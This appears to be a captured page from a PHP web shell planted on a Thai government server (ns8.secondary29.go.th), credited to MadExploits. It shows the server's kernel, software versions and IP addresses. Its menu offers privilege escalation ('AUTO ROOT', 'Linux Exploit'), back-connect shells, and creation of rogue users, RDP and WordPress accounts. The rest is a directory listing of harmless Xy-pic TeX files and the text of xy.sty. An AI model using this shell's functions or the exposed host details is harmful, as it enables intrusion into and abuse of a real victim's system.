Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
texmf /
tex /
generic /
xypic /
[ HOME SHELL ]
Name
Size
Permission
Action
movie.cls
10.31
KB
-rw-r--r--
xy.sty
3.62
KB
-rw-r--r--
xy.tex
112.28
KB
-rw-r--r--
xy16textures.tex
5.22
KB
-rw-r--r--
xy17oztex.tex
4.95
KB
-rw-r--r--
xy2cell.tex
27.59
KB
-rw-r--r--
xyall.tex
1.48
KB
-rw-r--r--
xyarc.tex
29.56
KB
-rw-r--r--
xyarrow.tex
22.19
KB
-rw-r--r--
xycmactex.tex
1.32
KB
-rw-r--r--
xycmtip.tex
1.41
KB
-rw-r--r--
xycolor.tex
4.52
KB
-rw-r--r--
xycrayon.tex
1.47
KB
-rw-r--r--
xycurve.tex
107.15
KB
-rw-r--r--
xydummy.tex
1.48
KB
-rw-r--r--
xydvidrv.tex
1.58
KB
-rw-r--r--
xydvips.tex
5.54
KB
-rw-r--r--
xydvitops.tex
7.31
KB
-rw-r--r--
xyemtex.tex
4.44
KB
-rw-r--r--
xyframe.tex
23.62
KB
-rw-r--r--
xygraph.tex
9.46
KB
-rw-r--r--
xyidioms.tex
2.89
KB
-rw-r--r--
xyimport.tex
3.45
KB
-rw-r--r--
xyknot.tex
37.51
KB
-rw-r--r--
xylatex.ini
2.39
KB
-rw-r--r--
xyline.tex
10.72
KB
-rw-r--r--
xymacpat.xyp
3.48
KB
-rw-r--r--
xymatrix.tex
21.54
KB
-rw-r--r--
xymovie.tex
2.75
KB
-rw-r--r--
xynecula.tex
9.31
KB
-rw-r--r--
xyoztex.tex
5.08
KB
-rw-r--r--
xypic.sty
857
B
-rw-r--r--
xypic.tex
1.1
KB
-rw-r--r--
xypoly.tex
24.46
KB
-rw-r--r--
xyps-c.tex
3.26
KB
-rw-r--r--
xyps-col.tex
4.59
KB
-rw-r--r--
xyps-f.tex
5.1
KB
-rw-r--r--
xyps-l.tex
2.98
KB
-rw-r--r--
xyps-pro.tex
7.36
KB
-rw-r--r--
xyps-ps.tex
11.39
KB
-rw-r--r--
xyps-r.tex
2.68
KB
-rw-r--r--
xyps-s.tex
2.18
KB
-rw-r--r--
xyps-t.tex
3
KB
-rw-r--r--
xyps.tex
14.59
KB
-rw-r--r--
xypsdict.tex
9.36
KB
-rw-r--r--
xypspatt.tex
3.8
KB
-rw-r--r--
xyrecat.tex
1.41
KB
-rw-r--r--
xyrotate.tex
6.89
KB
-rw-r--r--
xysmart.tex
10.04
KB
-rw-r--r--
xytex.ini
1.79
KB
-rw-r--r--
xytextures.tex
5.15
KB
-rw-r--r--
xytile.tex
5.08
KB
-rw-r--r--
xytips.tex
3.45
KB
-rw-r--r--
xytp-f.tex
7.28
KB
-rw-r--r--
xytpic.tex
10.47
KB
-rw-r--r--
xyv2.tex
10.55
KB
-rw-r--r--
xyweb.tex
3.75
KB
-rw-r--r--
xyxdvi.tex
5.27
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xy.sty
%% $Id: xy.sty,v 3.3 1996/12/19 03:31:56 krisrose Exp $ %% %% ``Xy-pic as LaTeX 2.09 style option and LaTeX 2e package''. %% Copyright (c) 1993-1996 Kristoffer H. Rose <krisrose@brics.dk> %% %% This file is part of the Xy-pic package for graphs and diagrams in TeX. %% See the companion README and INSTALL files for further information. %% Copyright (c) 1991-1996 Kristoffer H. Rose <krisrose@brics.dk> %% %% The Xy-pic package is free software; you can redistribute it and/or modify %% it under the terms of the GNU General Public License as published by the %% Free Software Foundation; either version 2 of the License, or (at your %% option) any later version. %% %% The Xy-pic package is distributed in the hope that it will be useful, but %% WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY %% or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License %% for more details. %% %% You should have received a copy of the GNU General Public License along %% with this package; if not, write to the Free Software Foundation, Inc., %% 675 Mass Ave, Cambridge, MA 02139, USA. % Load Xy-pic with catcode of @ set as it will be in user text: \count255=\the\catcode`\@ {\catcode`\@=11 \xdef\xystycatcode{\the\count255}} \makeatletter % REPAIR bug of the 2e version of AMS-LaTeX where \makeatother is broken... \ifx\@ifpackageloaded\undefined \makeatother \else \@ifpackageloaded{amstex}{\catcode`\@=\active}{\makeatother}\fi \input xy % That is all unless this is called as a LaTeX2e `native mode' package. Is % there an official way to check this? Anyway, this seems to work: \makeatletter \ifx\if@compatibility\undefined \catcode`\@=\xystycatcode \endinput \fi % Ensure that we are *really* running LaTeX2e...! \NeedsTeXFormat{LaTeX2e} % This file provides the current version of Xy-pic! \edef\next{% \noexpand\ProvidesPackage{xy}[\xydate\space Xy-pic version \xyversion]}\next % Recognise some standard LaTeX2e class options (cf. `LaTeX Companion' p.317): \DeclareOption{cmactex}{\xyoption{cmactex}} \DeclareOption{dvips}{\xyoption{dvips}\xyoption{ps}} \DeclareOption{dvitops}{\xyoption{dvitops}\xyoption{ps}} \DeclareOption{emtex}{\xyoption{emtex}} \DeclareOption{ln}{\xywarning@{`ln' DVI driver not yet fully supported}} \DeclareOption{oztex}{\xyoption{oztex}} \DeclareOption{textures}{\xyoption{textures}} \DeclareOption{xdvi}{\xyoption{xdvi}} % This is special: \DeclareOption{colour}{\xyoption{color}} % :-) % This (obsolete) cmtip style option should be activated after loading: \DeclareOption{cmtip}{\xyoption{cmtip}\UseComputerModernTips} % Pass the desired tip size if defined \DeclareOption{10pt}{\xywithoption{tips}{\def\tipsize@@{10}}} \DeclareOption{11pt}{\xywithoption{tips}{\def\tipsize@@{11}}} \DeclareOption{12pt}{\xywithoption{tips}{\def\tipsize@@{12}}} % Other options are just loaded. \DeclareOption*{\edef\next{\noexpand\xyoption{\CurrentOption}}\next} % Reinstall catcode of @... \catcode`\@=\xystycatcode % ... process the options, and that is all. \ProcessOptions \endinput % $Log: xy.sty,v $ % Revision 3.3 1996/12/19 03:31:56 krisrose % Maintenance release % % Revision 3.1 1995/09/05 20:31:32 kris % Releasing! % % Revision 3.0 1995/07/07 20:14:21 kris % Major release w/new User's Guide! % % Revision 2.13 1995/07/04 15:11:17 kris % Ready to release v3? % % Revision 2.12 1994/10/25 11:34:25 kris % Interim release just before v3 [works with AMS-LaTeX 1.2]... % % Revision 2.9 1994/06/09 14:59:19 kris % Release 3beta. % % Revision 2.8 1994/04/08 04:30:00 kris % Second (bug fix) 3alpha release. % % Revision 2.7 1994/03/08 02:06:01 kris % Release 3alpha. % % New for version 2.7.
Close